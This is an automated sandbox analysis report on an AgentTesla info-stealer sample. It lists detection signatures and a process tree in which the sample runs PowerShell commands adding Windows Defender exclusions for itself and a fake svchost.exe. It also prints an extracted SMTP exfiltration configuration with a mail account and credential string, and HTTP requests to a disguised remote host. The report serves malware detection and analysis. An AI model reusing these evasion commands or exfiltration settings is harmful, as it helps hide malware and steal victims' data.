Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report qINcOlwRud.exe

Overview

General Information

Sample Name:qINcOlwRud.exe
Analysis ID:383942
MD5:d6b29add344d2284845f133b8505126e
SHA1:fdb44b36f8c31a60a47db4f4ce6d4975367d7a7c
SHA256:552a8d763c86bb50ded18cf8f790f18828c471ec5a4d3cac71eaf7693314a04c
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files with benign system names
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

  • System is w10x64
  • qINcOlwRud.exe (PID: 5476 cmdline: 'C:\Users\user\Desktop\qINcOlwRud.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1364 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3880 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5756 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • qINcOlwRud.exe (PID: 4456 cmdline: C:\Users\user\Desktop\qINcOlwRud.exe MD5: D6B29ADD344D2284845F133B8505126E)
    • WerFault.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5820 cmdline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 6236 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6264 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6320 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6644 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6692 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • svchost.exe (PID: 4468 cmdline: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe MD5: D6B29ADD344D2284845F133B8505126E)
  • svchost.exe (PID: 3776 cmdline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 6860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4664 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5328 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5868 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5412 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1320 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2000 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "m4ximilia@yandex.comx103860*&1333smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.2.qINcOlwRud.exe.43826f0.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0.2.qINcOlwRud.exe.434c6d0.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0.2.qINcOlwRud.exe.434c6d0.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0.2.qINcOlwRud.exe.43826f0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0.2.qINcOlwRud.exe.43826f0.7.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "m4ximilia@yandex.comx103860*&1333smtp.yandex.com"}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeReversingLabs: Detection: 27%
            Multi AV Scanner detection for submitted fileShow sources
            Source: qINcOlwRud.exeVirustotal: Detection: 21%Perma Link
            Source: qINcOlwRud.exeReversingLabs: Detection: 27%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: qINcOlwRud.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49683 version: TLS 1.0
            Source: C:\Users\user\Desktop\qINcOlwRud.exeDirectory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEVJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeDirectory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeJump to behavior
            Source: qINcOlwRud.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Core.ni.pdbRSDSD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Xml.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: Accessibility.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: np6pVisualBasic.pdb43 source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb`] source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: np6pVisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: .pdb% source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp
            Source: Binary string: System.Xml.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: (P+pLC:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Users\user\Desktop\qINcOlwRud.PDB( source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: mscorlib.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Windows.Forms.pdb0 source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Xml.pdbD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
            Source: Joe Sandbox ViewIP Address: 104.21.56.119 104.21.56.119
            Source: Joe Sandbox ViewIP Address: 104.21.56.119 104.21.56.119
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49683 version: TLS 1.0
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
            Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" 